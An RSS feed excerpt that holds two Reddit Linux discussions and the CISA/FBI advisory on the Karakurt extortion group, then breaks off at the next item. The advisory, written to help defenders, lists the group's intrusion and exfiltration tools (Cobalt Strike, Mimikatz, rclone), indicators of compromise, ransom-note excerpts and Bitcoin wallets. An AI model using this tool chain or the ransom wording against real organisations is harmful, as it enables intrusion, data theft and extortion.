<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Do you think using iOS devices like iPhone or iPad by a Linux user is competent to the case with Android devices?</p> <p>First of all, I personally think current iOS devices are much, much better than its competitors with Android OS if not considering the continuity with desktop/laptop devices in both hardware specs and software usability.</p> <p>But if you are using Linux (and probably Windows) host for daily life, have you also found that using iOS device with Linux host has really put severe limitations on continuity experience? I managed to solve some issues like sending clipboard or current web page of iOS device through SSH command using iOS Shortcut on Sharing button (they are not perfect as you have to manually input the target address on which devices you want to send and I don't know that the web session info is also transferred with iOS native continuity which is not possible on this approach). For documents or files, I use Google Docs and Onedrive on iOS devices and host (with rclone) so its kinda OK. Sharing persistent DB for iOS sharing without iCloud storage is kinda slow since it has to be pushed to host Onedrive rclone directory through SSH but it also can be tolerated.</p> <p>But there are many things that it is just not possible or competent. Copying clipboard from the host is inconvenient as the sharing button requires any object to be selected and bringing current host web page is not perfect as the last active tab is updated with intervals on Firefox. Sharing active phone call, stored SMS/iMessages, or newly created general files like voice records other than photos/videos (which can be automatically backed up through Onedrive) cannot be accessed at all with the Shortcut, and probably nor an application without jailbreaking. Calling phone or sending SMS/iMessage on the host is also not possible. I am considering to write application code not iOS shortcut and do jailbreak but not sure about capabilities that can be earned with this approach nor the worth from doing so.</p> <p>Also on Linux, many accessories like Airpods and Apple Watch which are basically essential if you are going to use earpods or watch with iOS devices because of iOS integrity, are simply not functional or stable (i.e. degraded sound and unstable connection with Airpods on Linux host). General accessories are not convenient on iOS devices as there system-integrated UI/UX cannot be used with third-party devices. So it pretty much means that you have to use (buy and carry) separate devices in order to use iOS and Linux devices altogether, not being able to integrate them.</p> <p>I wonder your opinions, experiences, or workarounds on using iOS devices with Linux host. Any comments will be grateful.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/hurryman2212"> /u/hurryman2212 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/xt0s5a/your_experience_on_ios_devices_with_linux_desktop/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/xt0s5a/your_experience_on_ios_devices_with_linux_desktop/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Everyone hates ChromeOS...so why not create a competitor?]]></title>
<description><![CDATA[One thing I haven't seen is a re-roll of this concept, using Firefox or ungoogled Chromium. Or even Googled Chromium or Edge. Put just enough Linux and DE underneath it to support it, use FUSE to access a cloud filesystem (you could even use rclone to support multiple different ones) you could ev...]]></description>
<link>https://tsecurity.de/de/1606274/linux-tipps/everyone-hates-chromeosso-why-not-create-a-competitor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1606274/linux-tipps/everyone-hates-chromeosso-why-not-create-a-competitor/</guid>
<pubDate>Fri, 19 Aug 2022 15:30:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>One thing I haven't seen is a re-roll of this concept, using Firefox or ungoogled Chromium. Or even Googled Chromium or Edge. Put just enough Linux and DE underneath it to support it, use FUSE to access a cloud filesystem (you could even use rclone to support multiple different ones) you could even use a WM, make it goof proof, and put it out there as an alternative to ChromeOS FLEX. I know people dislike ChromeOS for a variety of reasons, but complaining about it doesn't help when there isn't an alternative to offer.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/npaladin2000"> /u/npaladin2000 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/wsd7vk/everyone_hates_chromeosso_why_not_create_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/wsd7vk/everyone_hates_chromeosso_why_not_create_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[AA22-152A: Karakurt Data Extortion Group]]></title>
<description><![CDATA[Original release date: June 1, 2022 | Last revised: June 2, 2022SummaryActions to take today to mitigate cyber threats from ransomware:
• Prioritize patching known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enforce multifactor authentication.

The Federa...]]></description>
<link>https://tsecurity.de/de/1533927/sicherheitsluecken/aa22-152a-karakurt-data-extortion-group/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1533927/sicherheitsluecken/aa22-152a-karakurt-data-extortion-group/</guid>
<pubDate>Tue, 07 Jun 2022 07:06:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Original release date: June 1, 2022 | Last revised: June 2, 2022<br><h3>Summary</h3><p class="tip-intro"><em><b>Actions to take today to mitigate cyber threats from ransomware:</b></em><br>
• Prioritize patching known exploited vulnerabilities.<br>
• Train users to recognize and report phishing attempts.<br>
• Enforce multifactor authentication.</p>

<p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) are releasing this joint Cybersecurity Advisory (CSA) to provide information on the Karakurt data extortion group, also known as the Karakurt Team and Karakurt Lair. Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.</p>

<p>Karakurt actors have typically provided screenshots or copies of stolen file directories as proof of stolen data. Karakurt actors have contacted victims’ employees, business partners, and clients [<a href="https://attack.mitre.org/versions/v11/techniques/T1591/002/">T1591.002</a>] with harassing emails and phone calls to pressure the victims to cooperate. The emails have contained examples of stolen data, such as social security numbers, payment accounts, private company emails, and sensitive business data belonging to employees or clients. Upon payment of ransoms, Karakurt actors have provided some form of proof of deletion of files and, occasionally, a brief statement explaining how the initial intrusion occurred.</p>

<p>Prior to January 5, 2022, Karakurt operated a leaks and auction website found at https://karakurt[.]group. The domain and IP address originally hosting the website went offline in the spring 2022. The website is no longer accessible on the open internet, but has been reported to be located elsewhere in the deep web and on the dark web. As of May 2022, the website contained several terabytes of data purported to belong to victims across North America and Europe, along with several “press releases” naming victims who had not paid or cooperated, and instructions for participating in victim data “auctions.”</p>

<p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf">Download the PDF version of this report (pdf, 442kb)</a>.</p>

<p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA22-152A.stix.xml">Click here</a> for STIX. </p>
<h3>Technical Details</h3><h4>Initial Intrusion</h4>

<p>Karakurt does not appear to target any specific sectors, industries, or types of victims. During reconnaissance [<a href="https://attack.mitre.org/versions/v11/tactics/TA0043/">TA0043</a>], Karakurt actors appear to obtain access to victim devices primarily:</p>

<ul><li>By purchasing stolen login credentials [<a href="https://attack.mitre.org/versions/v11/techniques/T1589/001/">T1589.001</a>] [<a href="https://attack.mitre.org/versions/v11/techniques/T1589/002/">T1589.002</a>]; </li>
	<li>Via cooperating partners in the cybercrime community, who provide Karakurt access to already compromised victims; or </li>
	<li>Through buying access to already compromised victims via third-party intrusion broker networks [<a href="https://attack.mitre.org/versions/v11/techniques/T1589/001/">T1589.001</a>].
	<ul><li><strong>Note:</strong> Intrusion brokers, or intrusion broker networks, are malicious individual cyber actors or groups of actors who use a variety of tools and skills to obtain initial access to—and often create marketable persistence within—protected computer systems. Intrusion brokers then sell access to these compromised computer systems to other cybercriminal actors, such as those engaged in ransomware, business email compromise, corporate and government espionage, etc. </li>
	</ul></li>
</ul><p>Common intrusion vulnerabilities exploited for initial access [<a href="https://attack.mitre.org/versions/v11/tactics/TA0001/">TA001</a>] in Karakurt events include the following:</p>

<ul><li>Outdated SonicWall SSL VPN appliances [<a href="https://attack.mitre.org/versions/v11/techniques/T1133/">T1133</a>] are vulnerable to multiple recent CVEs </li>
	<li>Log4j “Log4Shell” Apache Logging Services vulnerability (CVE-2021-44228) [<a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a>]</li>
	<li>Phishing and spearphishing [<a href="https://attack.mitre.org/versions/v11/techniques/T1566/">T1566</a>]</li>
	<li>Malicious macros within email attachments [<a href="https://attack.mitre.org/versions/v11/techniques/T1566/001/">T1566.001</a>]</li>
	<li>Stolen virtual private network (VPN) or Remote Desktop Protocol (RDP) credentials [<a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a>]</li>
	<li>Outdated Fortinet FortiGate SSL VPN appliances <a href="https://attack.mitre.org/versions/v11/techniques/T1133/">[T1133</a>]/firewall appliances [<a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a>] are vulnerable to multiple recent CVEs</li>
	<li>Outdated and/or unserviceable Microsoft Windows Server instances</li>
</ul><h4>Network Reconnaissance, Enumeration, Persistence, and Exfiltration</h4>

<p>Upon developing or obtaining access to a compromised system, Karakurt actors deploy Cobalt Strike beacons to enumerate a network [<a href="https://attack.mitre.org/versions/v11/techniques/T1083/">T1083</a>], install Mimikatz to pull plain-text credentials [<a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a>], use AnyDesk to obtain persistent remote control [<a href="https://attack.mitre.org/versions/v11/techniques/T1219/">T1219</a>], and utilize additional situation-dependent tools to elevate privileges and move laterally within a network.</p>

<p>Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services [<a href="https://attack.mitre.org/versions/v11/techniques/T1048/">T1048</a>], such as Filezilla, and cloud storage services including rclone and Mega.nz [<a href="https://attack.mitre.org/versions/v11/techniques/T1567/002/">T1567.002</a>]. </p>

<h4>Extortion</h4>

<p>Following the exfiltration of data, Karakurt actors present the victim with ransom notes by way of “readme.txt” files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts. The ransom notes reveal the victim has been hacked by the “Karakurt Team” and threaten public release or auction of the stolen data. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code open a chat application over which victims can negotiate with Karakurt actors to have their data deleted. </p>

<p>Karakurt victims have reported extensive harassment campaigns by Karakurt actors in which employees, business partners, and clients receive numerous emails and phone calls warning the recipients to encourage the victims to negotiate with the actors to prevent the dissemination of victim data. These communications often included samples of stolen data—primarily personally identifiable information (PII), such as employment records, health records, and financial business records.</p>

<p>Victims who negotiate with Karakurt actors receive a “proof of life,” such as screenshots showing file trees of allegedly stolen data or, in some cases, actual copies of stolen files. Upon reaching an agreement on the price of the stolen data with the victims, Karakurt actors provided a Bitcoin address—usually a new, previously unused address—to which ransom payments could be made. Upon receiving the ransom, Karakurt actors provide some form of alleged proof of deletion of the stolen files, such as a screen recording of the files being deleted, a deletion log, or credentials for a victim to log into a storage server and delete the files themselves.</p>

<p>Although Karakurt’s primary extortion leverage is a promise to delete stolen data and keep the incident confidential, some victims reported Karakurt actors did not maintain the confidentiality of victim information after a ransom was paid. <strong>Note: </strong>the U.S. government strongly discourages the payment of any ransom to Karakurt threat actors, or any cyber criminals promising to delete stolen files in exchange for payments.</p>

<p>In some cases, Karakurt actors have conducted extortion against victims previously attacked by other ransomware variants. In such cases, Karakurt actors likely purchased or otherwise obtained previously stolen data. Karakurt actors have also targeted victims at the same time these victims were under attack by other ransomware actors. In such cases, victims received ransom notes from multiple ransomware variants simultaneously, suggesting Karakurt actors purchased access to a compromised system that was also sold to another ransomware actor.</p>

<p>Karakurt actors have also exaggerated the degree to which a victim had been compromised and the value of data stolen. For example, in some instances, Karakurt actors claimed to steal volumes of data far beyond the storage capacity of compromised systems or claimed to steal data that did not belong to the victim.<br>
 </p>

<h3>Indicators of Compromise </h3>

<p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" scope="col"><strong>Email</strong></th>
		</tr></thead><tbody><tr><td scope="col">mark.hubert1986@gmail.com; karakurtlair@gmail.com; personal.information.reveal@gmail.com; ripidelfun1986@protonmail.com; gapreappballye1979@protonmail.com; confedicial.datas.download@protonmail.com; armada.mitchell94@protonmail.com</td>
		</tr><tr><td scope="col"><em>Protonmail email accounts in the following formats:</em><br>
			victimname_treasure@protonmail.com<br>
			victimname_jewels@protonmail.com<br>
			victimname_files@protonmail.com</td>
		</tr></tbody></table><p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" colspan="2" scope="col"><strong>Tools</strong></th>
		</tr></thead><tbody><tr><td scope="col">Onion site</td>
			<td scope="col">https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion</td>
		</tr><tr><td scope="col">Tools</td>
			<td scope="col">Rclone.exe;; AnyDesk.exe; Mimikatz</td>
		</tr><tr><td scope="col">Ngrok</td>
			<td scope="col">SSH tunnel application SHA256 - 3e625e20d7f00b6d5121bb0a71cfa61f92d658bcd61af2cf5397e0ae28f4ba56</td>
		</tr><tr><td scope="col">DLLs masquerading as legitimate Microsoft binaries to System32</td>
			<td scope="col">Mscxxx.dll: SHA1 - c33129a680e907e5f49bcbab4227c0b02e191770<br>
			Msuxxx.dll: SHA1 - 030394b7a2642fe962a7705dcc832d2c08d006f5</td>
		</tr><tr><td scope="col">Msxsl.exe</td>
			<td scope="col">Legitimate Microsoft Command Line XSL Transformation Utility SHA1 - 8B516E7BE14172E49085C4234C9A53C6EB490A45</td>
		</tr><tr><td scope="col">dllhosts.exe </td>
			<td scope="col">Rclone SHA1 - fdb92fac37232790839163a3cae5f37372db7235</td>
		</tr><tr><td scope="col">rclone.conf</td>
			<td scope="col">Rclone configuration file</td>
		</tr><tr><td scope="col">filter.txt</td>
			<td scope="col">Rclone file extension filter file</td>
		</tr><tr><td scope="col">c.bat</td>
			<td scope="col">UNKNOWN</td>
		</tr><tr><td scope="col">3.bat</td>
			<td scope="col">UNKNOWN</td>
		</tr><tr><td scope="col">Potential malicious document</td>
			<td scope="col">SHA1 - 0E50B289C99A35F4AD884B6A3FFB76DE4B6EBC14</td>
		</tr></tbody></table><p>.</p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" colspan="2" scope="col"><strong>Tools</strong></th>
		</tr></thead><tbody><tr><td scope="col">Potential malicious document</td>
			<td scope="col">SHA1 - 7E654C02E75EC78E8307DBDF95E15529AAAB5DFF</td>
		</tr><tr><td scope="col">Malicious text file</td>
			<td scope="col">SHA1 - 4D7F4BB3A23EAB33A3A28473292D44C5965DDC95</td>
		</tr><tr><td scope="col">Malicious text file</td>
			<td scope="col">SHA1 - 10326C2B20D278080AA0CA563FC3E454A85BB32F</td>
		</tr></tbody></table><p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" scope="col"><strong>Cobalt Strike hashes</strong></th>
		</tr></thead><tbody><tr><td scope="col">SHA256 - 563BC09180FD4BB601380659E922C3F7198306E0CAEBE99CD1D88CD2C3FD5C1B</td>
		</tr><tr><td scope="col">SHA256 - 5E2B2EBF3D57EE58CADA875B8FBCE536EDCBBF59ACC439081635C88789C67ACA</td>
		</tr><tr><td scope="col">SHA256 - 712733C12EA3B6B7A1BCC032CC02FD7EC9160F5129D9034BF9248B27EC057BD2</td>
		</tr><tr><td scope="col">SHA256 - 563BC09180FD4BB601380659E922C3F7198306E0CAEBE99CD1D88CD2C3FD5C1B</td>
		</tr><tr><td scope="col">SHA256 - 5E2B2EBF3D57EE58CADA875B8FBCE536EDCBBF59ACC439081635C88789C67ACA</td>
		</tr><tr><td scope="col">SHA256 - 712733C12EA3B6B7A1BCC032CC02FD7EC9160F5129D9034BF9248B27EC057BD2</td>
		</tr><tr><td scope="col">SHA1 - 86366bb7646dcd1a02700ed4be4272cbff5887af</td>
		</tr></tbody></table><p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" colspan="2" scope="col"><strong>Ransom note text sample:</strong></th>
		</tr></thead><tbody><tr><td scope="col">
			<ol><li> </li>
			</ol></td>
			<td scope="col">
			<p>Here's the deal </p>

			<p>We breached your internal network and took control over all of your systems.</p>
			</td>
		</tr><tr><td scope="col">
			<p>      2.</p>
			</td>
			<td scope="col">We analyzed and located each piece of more-or-less important files while spending weeks inside.</td>
		</tr><tr><td scope="col">
			<p>      3. </p>
			</td>
			<td scope="col">We exfiltrated anything we wanted (xxx GB (including Private &amp; Confidential information, Intellectual Property, Customer Information and most important Your TRADE SECRETS)</td>
		</tr></tbody></table><p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" colspan="2" scope="col"><strong>Ransom note text sample:</strong></th>
		</tr></thead><tbody><tr><td rowspan="2" scope="col">
			<p>FAQ:</p>
			</td>
			<td scope="col">
			<p>Who the hell are you?</p>
			</td>
		</tr><tr><td scope="col">Who the hell are you?</td>
		</tr></tbody></table><p> </p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th class="text-align-left" scope="col"><strong>Payment Wallets:</strong></th>
		</tr></thead><tbody><tr><td scope="col">bc1qfp3ym02dx7m94td4rdaxy08cwyhdamefwqk9hp</td>
		</tr><tr><td scope="col">bc1qw77uss7stz7y7kkzz7qz9gt7xk7tfet8k30xax</td>
		</tr><tr><td scope="col">bc1q8ff3lrudpdkuvm3ehq6e27nczm393q9f4ydlgt</td>
		</tr><tr><td scope="col">bc1qenjstexazw07gugftfz76gh9r4zkhhvc9eeh47</td>
		</tr><tr><td scope="col">bc1qxfqe0l04cy4qgjx55j4qkkm937yh8sutwhlp4c</td>
		</tr><tr><td scope="col">bc1qw77uss7stz7y7kkzz7qz9gt7xk7tfet8k30xax</td>
		</tr><tr><td scope="col">bc1qrtq27tn34pvxaxje4j33g3qzgte0hkwshtq7sq</td>
		</tr><tr><td scope="col">bc1q25km8usscsra6w2falmtt7wxyga8tnwd5s870g</td>
		</tr><tr><td scope="col">bc1qta70dm5clfcxp4deqycxjf8l3h4uymzg7g6hn5</td>
		</tr><tr><td scope="col">bc1qrkcjtdjccpy8t4hcna0v9asyktwyg2fgdmc9al</td>
		</tr><tr><td scope="col">bc1q3xgr4z53cdaeyn03luhen24xu556y5spvyspt8</td>
		</tr><tr><td scope="col">bc1q6s0k4l8q9wf3p9wrywf92czrxaf9uvscyqp0fu</td>
		</tr><tr><td scope="col">bc1qj7aksdmgrnvf4hwjcm5336wg8pcmpegvhzfmhw</td>
		</tr><tr><td scope="col">bc1qq427hlxpl7agmvffteflrnasxpu7wznjsu02nc</td>
		</tr><tr><td scope="col">bc1qz9a0nyrqstqdlr64qu8jat03jx5smxfultwpm0</td>
		</tr><tr><td scope="col">bc1qq9ryhutrprmehapvksmefcr97z2sk3kdycpqtr</td>
		</tr><tr><td scope="col">bc1qa5v6amyey48dely2zq0g5c6se2keffvnjqm8ms</td>
		</tr><tr><td scope="col">bc1qx9eu6k3yhtve9n6jtnagza8l2509y7uudwe9f6</td>
		</tr><tr><td scope="col">bc1qtm6gs5p4nr0y5vugc93wr0vqf2a0q3sjyxw03w</td>
		</tr><tr><td scope="col">bc1qta70dm5clfcxp4deqycxjf8l3h4uymzg7g6hn5</td>
		</tr><tr><td scope="col">bc1qx9eu6k3yhtve9n6jtnagza8l2509y7uudwe9f6</td>
		</tr><tr><td scope="col">bc1qqp73up3xff6jz267n7vm22kd4p952y0mhcd9c8</td>
		</tr><tr><td scope="col">bc1q3xgr4z53cdaeyn03luhen24xu556y5spvyspt8</td>
		</tr></tbody></table><h3>Mitre Att&amp;ck Techniques</h3>

<p>Karakurt actors use the ATT&amp;CK techniques listed in table 1.<br>
 </p>

<p class="text-align-center"><em>Table 1: Karakurt actors ATT&amp;CK techniques for enterprise</em></p>

<table align="center" border="1" cellpadding="1" cellspacing="1" class="general-table"><thead><tr><th colspan="3" scope="col"><u><strong>Reconnaissance</strong></u></th>
		</tr></thead><tbody><tr><td class="text-align-center" scope="col">Technique Title</td>
			<td class="text-align-center" scope="col">ID</td>
			<td class="text-align-center" scope="col">Use</td>
		</tr><tr><td scope="col">Gather Victim Identify Information: Credentials</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1589/001/">T1589.001</a></td>
			<td scope="col">Karakurt actors have purchased stolen login credentials.</td>
		</tr><tr><td scope="col">Gather Victim Identity Information: Email Addresses</td>
			<td scope="col">
			<p><a href="https://attack.mitre.org/versions/v11/techniques/T1589/002/">T1589.002</a></p>
			</td>
			<td scope="col">Karakurt actors have purchased stolen login credentials including email addresses.</td>
		</tr><tr><td scope="col">Gather Victim Org Information: Business Relationships</td>
			<td scope="col"><a href="https://attack.mitre.org/techniques/T1591/002/">T1591.002</a></td>
			<td scope="col">Karakurt actors have leveraged victims' relationships with business partners.</td>
		</tr><tr><td class="text-align-center" colspan="3" scope="col"><u><strong>Initial Access</strong></u></td>
		</tr><tr><td class="text-align-center" scope="col">Technique Title</td>
			<td class="text-align-center" scope="col">ID</td>
			<td class="text-align-center" scope="col">Use</td>
		</tr><tr><td scope="col">Exploit Public-Facing Applications</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a></td>
			<td scope="col">Karakurt actors have exploited the Log4j "Log4Shell" Apache Logging Service vulnerability and vulnerabilities in outdated firewall appliances for gaining access to victims' networks.</td>
		</tr><tr><td scope="col">External Remote Services</td>
			<td scope="col"><a href="https://attack.mitre.org/techniques/T1133/">T1133</a></td>
			<td scope="col">Karakurt actors have exploited vulnerabilities in outdated VPN appliances for gaining access to victims' networks.</td>
		</tr><tr><td scope="col">Phishing</td>
			<td scope="col"><a href="https://attack.mitre.org/techniques/T1566/">T1566</a></td>
			<td scope="col">Karakurt actors have used phishing and spearphishing to obtain access to victims' networks.</td>
		</tr><tr><td scope="col">Phishing – Spearphishing Attachment</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1566/001/">T1566.001</a></td>
			<td scope="col">Karakurt actors have sent malicious macros as email attachments to gain initial access.</td>
		</tr><tr><td scope="col">Valid Accounts</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a></td>
			<td scope="col">Karakurt actors have purchased stolen credentials, including VPN and RDP credentials, to gain access to victims' networks.</td>
		</tr><tr><td class="text-align-center" colspan="3" scope="col"><u><strong>Privilege Escalation</strong></u></td>
		</tr><tr><td class="text-align-center" scope="col">Technique Title</td>
			<td class="text-align-center" scope="col">ID</td>
			<td class="text-align-center" scope="col">Use</td>
		</tr><tr><td scope="col">Valid Accounts</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a></td>
			<td scope="col">Karakurt actors have installed Mimikatz to pull plain-text credentials.</td>
		</tr><tr><td colspan="3" scope="col"> </td>
		</tr><tr><td class="text-align-center" scope="col">Technique Title</td>
			<td class="text-align-center" scope="col">ID</td>
			<td class="text-align-center" scope="col">Use</td>
		</tr><tr><td scope="col">File and Directory Discovery</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1083/">T1083</a></td>
			<td scope="col">Karakurt actors have deployed Cobalt Strike beacons to enumerate a network.</td>
		</tr><tr><td colspan="3" scope="col"> </td>
		</tr><tr><td scope="col">Technique Title</td>
			<td scope="col">ID</td>
			<td scope="col">Use</td>
		</tr><tr><td scope="col">Remote Access Software</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1219/">T1219</a></td>
			<td scope="col">Karakurt actors have used AnyDesk to obtain persistent remote control of victims' systems.</td>
		</tr><tr><td class="text-align-center" colspan="3" scope="col"><strong><u>Exfiltration </u></strong></td>
		</tr><tr><td class="text-align-center" scope="col">Technique Title</td>
			<td class="text-align-center" scope="col">ID</td>
			<td class="text-align-center" scope="col">Use</td>
		</tr><tr><td scope="col">Exfiltration Over Alternative Protocol</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1048/">T1048</a></td>
			<td scope="col">Karakurt actors have used FTP services, including Filezilla, to exfiltrate data from victims' networks.</td>
		</tr><tr><td scope="col">Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
			<td scope="col"><a href="https://attack.mitre.org/versions/v11/techniques/T1567/002/">T1567.002</a></td>
			<td scope="col">Karakurt actors have used rclone and Mega.nz to exfiltrate data stolen from victims' networks.</td>
		</tr></tbody></table><p> </p>
<h3>Mitigations</h3><ul><li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</li>
	<li>Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.</li>
	<li>Regularly back up data and password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.</li>
	<li>Install and regularly update antivirus software on all hosts and enable real time detection.</li>
	<li>Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.</li>
	<li>Review domain controllers, servers, workstations, and active directories for new or unrecognized accounts. </li>
	<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.</li>
	<li>Disable unused ports.</li>
	<li>Consider adding an email banner to emails received from outside your organization.</li>
	<li>Disable hyperlinks in received emails.</li>
	<li>Enforce multi-factor authentication. </li>
	<li>Use <a href="https://pages.nist.gov/800-63-3/">National Institute for Standards and Technology (NIST) standards</a> for developing and managing password policies.
	<ul><li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;</li>
		<li>Store passwords in hashed format using industry-recognized password managers;</li>
		<li>Add password user “salts” to shared login credentials;</li>
		<li>Avoid reusing passwords;</li>
		<li>Implement multiple failed login attempt account lockouts;</li>
		<li>Disable password “hints”;</li>
		<li>Refrain from requiring password changes more frequently than once per year. <strong>Note: </strong>NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher. </li>
		<li>Require administrator credentials to install software.</li>
	</ul></li>
	<li>Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.</li>
	<li>Focus on cyber security awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities (i.e., ransomware and phishing scams).</li>
</ul><h3>Resources</h3>

<ul><li>For additional resources related to the prevention and mitigation of ransomware, visit <a href="https://www.cisa.gov/stopransomware">Stopransomware.gov</a> as well as the <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf">CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide</a> and NIST’s <a href="https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/detect-respond">Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events</a>. <a href="https://www.cisa.gov/stopransomware">Stopransomware.gov</a> is the U.S. government’s one-stop location for resources to tackle ransomware more effectively.</li>
	<li>CISA’s <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a> is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident. </li>
	<li>CISA offers a range of no-cost <a href="https://www.cisa.gov/cyber-hygiene-services">cyber hygiene services</a> to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. </li>
	<li>Financial Institutions must also ensure compliance with any applicable Bank Secrecy Act requirements, including suspicious activity reporting obligations. Indicators of Compromise, such as suspicious email addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports (SARs), see FinCEN Advisory FIN-2016-A005, <em><a href="https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a005">Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime</a></em>, October 25, 2016, and FinCEN Advisory FIN-2021-A004, <em><a href="https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2021-a004">Advisory on Ransomware and the Use of the Financial System to Facilitate Ransom Payments</a></em>, November 8, 2021, which updates FinCEN Advisory FIN-2020-A006.</li>
	<li>The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the <a href="https://www.state.gov/rewards-for-justice/">RFJ website</a> for more information and how to report information securely. </li>
</ul><h3>Revisions</h3>
		<ul><li>Initial Version: June 01, 2022</li>			            <li>June 2, 2022: Added STIX File</li>		</ul><hr><div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Free & Paid options for Security & Backup Software for Linux CLI?]]></title>
<description><![CDATA[Hey guys, I ordered a dedicated server that I use to host a bunch of my websites and web apps. However, I'm looking for some security software to protect it. Here are the server details and some things I have already done: Hardware:-------------------------------- Intel Xeon E-2274G 4 Cores  8 Th...]]></description>
<link>https://tsecurity.de/de/1522465/linux-tipps/best-free-paid-options-for-security-backup-software-for-linux-cli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1522465/linux-tipps/best-free-paid-options-for-security-backup-software-for-linux-cli/</guid>
<pubDate>Sun, 08 May 2022 09:46:08 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
